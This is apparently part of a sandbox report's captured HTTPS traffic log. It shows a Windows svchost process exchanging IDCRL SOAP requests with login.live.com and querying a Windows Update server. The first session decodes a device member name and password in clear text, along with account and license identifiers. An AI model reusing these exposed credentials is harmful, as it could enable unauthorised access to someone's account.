2024-09-06 07:57:54 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-09-06 07:57:54 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 74 6e 79 74 65 71 67 6c 63 66 74 71 74 75 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 78 5e 3f 3a 52 42 7e 46 69 79 45 69 51 7a 6a 2e 74 70 6c 5f 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 71 74 6c 74 6e 74 63 62 72 65 71 75 61 6a 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02tnyteqglcftqtu</Membername><Password>x^?:RB~FiyEiQzj.tpl_</Password></Authentication><OldMembername>02qtltntcbrequaj</OldM
2024-09-06 07:57:56 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Fri, 06 Sep 2024 07:56:54 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C526_BL2 x-ms-request-id: 4885c9fd-b5c4-46d0-93ff-f18a1edd4a0b PPServer: PPV: 30 H: BL02EPF0001D9E4 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:57:56 GMT Connection: close Content-Length: 17166
2024-09-06 07:57:56 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 30 30 31 30 37 44 34 42 32 30 34 39 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 36 39 38 32 31 36 65 65 2d 64 63 36 65 2d 34 35 66 32 2d 62 32 63 64 2d 30 64 32 61 66 61 34 62 34 64 35 30 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>001800107D4B2049</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="698216ee-dc6e-45f2-b2cd-0d2afa4b4d50" LicenseID="3252b20c-d425-4711
2024-09-06 07:57:56 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49705	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:57:58 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-09-06 07:57:58 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:57:58 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:56:58 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30345.2 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C553_BL2 x-ms-request-id: 162d42c9-ec48-460a-a884-5b642b43871f PPServer: PPV: 30 H: BL02EPF0001D9E6 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:57:58 GMT Connection: close Content-Length: 11389
2024-09-06 07:57:58 UTC	11389	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49706	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:57:59 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-09-06 07:57:59 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:58:00 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:56:59 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C553_BL2 x-ms-request-id: 03991fa9-7a5a-4914-b96c-467e6c0fb72b PPServer: PPV: 30 H: BL02EPF0001D92F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:57:59 GMT Connection: close Content-Length: 11389
2024-09-06 07:58:00 UTC	11389	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49707	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:00 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4710 Host: login.live.com
2024-09-06 07:58:00 UTC	4710	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:58:01 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:57:01 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C553_BL2 x-ms-request-id: 13a0356c-5cd0-4369-a2a7-15b993795c4c PPServer: PPV: 30 H: BL02EPF00027B5A V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:58:00 GMT Connection: close Content-Length: 10173
2024-09-06 07:58:01 UTC	10173	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49708	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:00 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-09-06 07:58:00 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:58:01 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:57:01 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C531_BAY x-ms-request-id: 12ed4d49-2d8e-41ce-8fe9-37736a9be8e5 PPServer: PPV: 30 H: PH1PEPF00011ED4 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:58:01 GMT Connection: close Content-Length: 1918
2024-09-06 07:58:01 UTC	1918	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49710	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:02 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-09-06 07:58:02 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:58:02 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:57:02 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C553_BL2 x-ms-request-id: e16917fc-8cdc-4910-b24c-bc8421e03f5a PPServer: PPV: 30 H: BL02EPF0001D8E8 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:58:01 GMT Connection: close Content-Length: 11409
2024-09-06 07:58:02 UTC	11409	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49713	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:03 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=slDVAaXtKD+FwpE&MD=5rttdFzP HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-06 07:58:04 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: e2442fc3-f81e-41b1-8639-21ce589e62bd MS-RequestId: d7dedd67-8c51-47f7-b5d1-295189e5f390 MS-CV: 6MPuxdKxo0WEly6b.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 06 Sep 2024 07:58:03 GMT Connection: close Content-Length: 24490
